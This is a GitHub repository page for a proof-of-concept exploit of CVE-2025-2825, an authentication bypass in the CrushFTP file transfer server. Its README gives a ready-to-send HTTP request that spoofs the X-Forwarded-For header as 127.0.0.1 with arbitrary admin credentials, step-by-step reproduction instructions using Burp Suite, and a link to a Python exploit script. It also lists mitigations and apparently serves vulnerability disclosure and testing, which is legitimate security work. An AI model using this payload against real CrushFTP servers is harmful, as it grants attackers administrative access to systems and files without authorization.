Skip to content

Shivshantp/CVE-2025-2825-CrushFTP-AuthBypass

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
 
 
 
 

Repository files navigation

CVE Exploit-Status

🚨 CVE-2025-2825 – CrushFTP Authentication Bypass

🔎 Overview

CVE-2025-2825 is a critical authentication bypass vulnerability affecting CrushFTP, a widely used secure file transfer server. The flaw allows remote attackers to bypass login authentication and gain administrative access by spoofing headers — tricking the server into thinking the request came from localhost.

  • Severity: Critical
  • CVSS Score: 9.8
  • Attack Vector: Remote
  • Affected Versions: CrushFTP < v10.6.0
  • Fixed In: v10.6.0 and above
  • Status: Under active exploitation in the wild

🧠 Technical Details

The vulnerability arises due to improper validation of the X-Forwarded-For header. When this header is set to 127.0.0.1, the server treats the request as local — bypassing authentication.


🧪 Proof of Concept (PoC)

🔸 HTTP Request Example:

GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1  
Host: target-ip  
X-Forwarded-For: 127.0.0.1

📝 Replace target-ip with the actual IP address of the target CrushFTP server.

If successful, the server bypasses authentication and grants access — even with incorrect credentials.


🔗 PoC Python Script

📄 cve-2025-2825-poc.py


🛠️ Tools & Technologies Used

  • Python – scripting the exploit
  • Burp Suite – intercepting and modifying HTTP headers
  • Wireshark – packet capture and analysis
  • Nmap – port scanning and service enumeration
  • CrushFTP – vulnerable target instance
  • GitHub – for publishing PoC and documentation

📝 Steps to Reproduce

  1. Set up a vulnerable version of CrushFTP (v10.5 or earlier).
  2. Intercept the login request using Burp Suite.
  3. Modify the HTTP request header:
    X-Forwarded-For: 127.0.0.1
    
  4. Forward the request.
  5. Admin access is granted without valid credentials.

✅ Mitigation

  • Upgrade to CrushFTP v10.6.0 or higher.
  • Sanitize and validate headers like X-Forwarded-For.
  • Restrict admin access to localhost or behind a VPN/firewall.
  • Monitor logs for suspicious access patterns.

👨‍💻 Author

Shivshant Patil
Certified Ethical Hacker (CEH v13)
B.Tech Computer Engineering Graduate
🔗 LinkedIn Profile 🔗 Github Profile


📚 References

About

Authentication Bypass PoC for CVE-2025-2825 – Exploiting CrushFTP 10.x

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages